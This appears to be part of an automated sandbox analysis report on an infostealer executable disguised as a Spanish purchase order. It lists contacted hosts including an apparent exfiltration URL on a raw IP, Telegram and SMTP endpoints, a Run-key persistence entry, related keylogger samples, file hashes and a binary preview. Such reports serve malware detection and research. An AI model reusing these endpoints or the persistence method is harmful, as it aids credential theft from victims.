http://checkip.dyndns.org/d	InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
185.230.214.164	smtp.zoho.eu	Netherlands	41913	COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1510344
Start date and time:	2024-09-12 21:05:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/7@5/5
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 96% Number of executed functions: 307 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 2036 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Simulations

Behavior and APIs

Time	Type	Description
15:06:12	API Interceptor	46x Sleep call for process: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe modified
15:06:56	API Interceptor	91x Sleep call for process: xload.exe modified
15:07:43	API Interceptor	321x Sleep call for process: InstallUtil.exe modified
20:06:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xload C:\Users\user\AppData\Roaming\xload.exe
20:06:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xload C:\Users\user\AppData\Roaming\xload.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Confirmare de plat#U0103_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	#U00d6deme Bildirimi_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	http://jnhxqc.com/	Get hash	malicious	Unknown	Browse
	DEMURRAGE INVOICE.bat.exe	Get hash	malicious	AgentTesla	Browse
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rShipmentNotification_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
188.114.97.3	Purchase order.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
	http://aivx.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	aivx.pages.dev/favicon.ico
	Comprobante.PDF867564575869708776565434576897.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sweetwhore/five/fre.php
	DOC092024-0431202229487.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/altr/
	Remittance advice.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/kslt/
	SecuriteInfo.com.FileRepMalware.20092.26363.exe	Get hash	malicious	Unknown	Browse	13213edsewrwrfw.okis.ru/
	EGCS-875-S5-SMO M2A.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/bm51/
	QUOTATION_SEPQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/iFjQMGIP/download
	Payment Advice-BG_EDG9502024082400480004_5944_246#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/9QtQlEKN/download
	http://ct-relevant-violet.pages.dev/help/contact/432501590512485	Get hash	malicious	Unknown	Browse	ct-relevant-violet.pages.dev/help/contact/432501590512485
185.230.214.164	Orden#46789_2024_Optoflux_mexico_sderlss.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Orden#46789_2024_Optoflux_mexico_sderls.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	okPY77wv6E.exe	Get hash	malicious	AgentTesla	Browse
	RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exe	Get hash	malicious	AgentTesla	Browse
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe	Get hash	malicious	GuLoader	Browse
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe	Get hash	malicious	AgentTesla	Browse
	INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exe	Get hash	malicious	AgentTesla	Browse
	VBG dk Payment Receipt --doc87349281.bat	Get hash	malicious	Remcos, AgentTesla, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRFQforNewOrder.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z27maxxy.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Shipment Document No - 100184429.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment Receipt 00000762511.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SWIFT DETAILS-ERROR.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	sipari#U00c5#U0178 UTR01072410 - EuroCRSP0177462 fiyat teklifi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment Receipt Confirmation.pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	rRFQforNewOrder.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	z27maxxy.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Shipment Document No - 100184429.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
api.telegram.org	Confirmare de plat#U0103_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	#U00d6deme Bildirimi_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://jnhxqc.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	DEMURRAGE INVOICE.bat.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rShipmentNotification_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
smtp.zoho.eu	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.212.164
	Orden#46789_2024_Optoflux_mexico_sderlss.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTY.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTYP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	okPY77wv6E.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Confirmare de plat#U0103_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	#U00d6deme Bildirimi_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	149.154.167.99
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://jnhxqc.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	DEMURRAGE INVOICE.bat.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://eyon.furukawasolutions.com/en/	Get hash	malicious	Unknown	Browse	104.21.25.78
	Important Notice_ Time-Sensitive Information from Delta Engineering..eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe	Get hash	malicious	Unknown	Browse	172.67.75.19
	https://apple-online.shop/ChromeSetup.exe/	Get hash	malicious	Unknown	Browse	104.17.25.14
	(No subject) (72).eml	Get hash	malicious	Unknown	Browse	162.159.61.3
	SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe	Get hash	malicious	Unknown	Browse	104.26.7.161
	https://aurubatourismauthority.projectfileshare.com/	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	test doc joesandbox.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.google.co.uk/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2FGlobalp.%E2%80%8Bkj%C2%ADdc%C2%ADuh%C2%ADn%E2%80%8B.o%C2%ADne%E2%80%8B/bB4C1m	Get hash	malicious	HTMLPhisher	Browse	104.21.35.64
COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documents	Get hash	malicious	Unknown	Browse	89.36.170.147
	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	bat.bat	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer, XWorm, zgRAT	Browse	185.230.212.169
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzM	Get hash	malicious	Unknown	Browse	89.36.170.147
	http://workdrive.zohoexternal.com	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9b	Get hash	malicious	Unknown	Browse	89.36.170.147
UTMEMUS	sipari#U00c5#U0178 UTR01072410 - EuroCRSP0177462 fiyat teklifi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment Receipt Confirmation.pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z27maxxy.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Shipment Document No - 100184429.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Payment Receipt 00000762511.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SWIFT DETAILS-ERROR.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Request for Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Quotation Approved PO#2838800-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	NEW ORDER PI_PT002777684770121-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ENQUIRY FOR QUOTATION REF.NO-2009008766.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRFQforNewOrder.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z27maxxy.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1XTtg4o4D3rVDatT-1eTIZjr2WQ95puAA8jccViOFGvQ/preview?jv22t	Get hash	malicious	Unknown	Browse	188.114.97.3
	Shipment Document No - 100184429.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment Receipt 00000762511.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bot_library.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bot_library.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	signed contract and order confirmation.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://ftp.hp.com/pub/softlib/software13/HPSA/HPSupportSolutionsFramework-13.0.1.131.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://www.nanpfund.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://profile.datasbase.click/administration.html?now=Angela.Tremblay@CSC-SCC.GC.CA	Get hash	malicious	Unknown	Browse	149.154.167.220
	Confirmare de plat#U0103_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	#U00d6deme Bildirimi_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.log

Download File

Process:	C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xload.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\xload.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\xload.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	814456
Entropy (8bit):	6.999684482071364
Encrypted:	false
SSDEEP:	24576:tIwQDfhj+um6SgDM75xQ/wYmk/8pD+S1o:ZQ7hrQM1
MD5:	FEC61E105CBB213BCDB38AF0DD1EC8BA
SHA1:	0FAB2CECF901EAC6CB0A7887E475257034AEC63B
SHA-256:	246922B00B01800ADEDAC053D0DD147EC65F3438F1620B2BB6A41F28CC21D149
SHA-512:	693A7EE0133017AAD5AA5D11B71B8924BCD33266DD1FF48B560B000DCEF2A5881460104D3EECD2B363FBA5C4DFBA4D207CE9E513533D888F94A1237EBE8E6B99
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... 'W..............................9... ...@....@.. ....................................`.................................t9..W....@...............0..x=...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................9......H...........lz...........$..............................................m...9.C>...bVk2...b":s.B.9....kS}.r..s.rx..........^....<..l.m..a..5.....TT.V...4....1.#M.jPy.....q._D.t..:.I.k2..U..z....s.WM.k."...F...Q..........].....^...[F.....W...M....Y.n.9N.)Z....3.+\..J-..0Y.....A.V.;...TL..^`S.u..Wx?.a..:...s.."....y./..C5.}/1.....0gM..3...H..[...i.....{..OY.<?e.z23\.."y....l^.E.,..%.c...kV"..1O."i&.$.q..+-}F.L.u.(...=.)=KD.......f9..0u...........>......X1J

C:\Users\user\AppData\Roaming\xload.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1411
Entropy (8bit):	4.784648103721753
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT0srh+AFSkIa:/N7AokItULVDv
MD5:	58DC7B668DFD2398B524E62E7C6D3FAA
SHA1:	C16A870DCA60E36479FCBA48B79AA4713DA26394
SHA-256:	1022869AD28F4FE4AF4AC1E743A8E7945056FD120CB244294EB3BD8A9E9244E8
SHA-512:	C58FFE7827C2464E75FE9215D97010BA1FE65DFEEA1917A91A38EADB7374B0DB364AC91C0C8268316F20983F921BF665193020EE0B4745F0BA3224FFAA16CB03
Malicious:	false
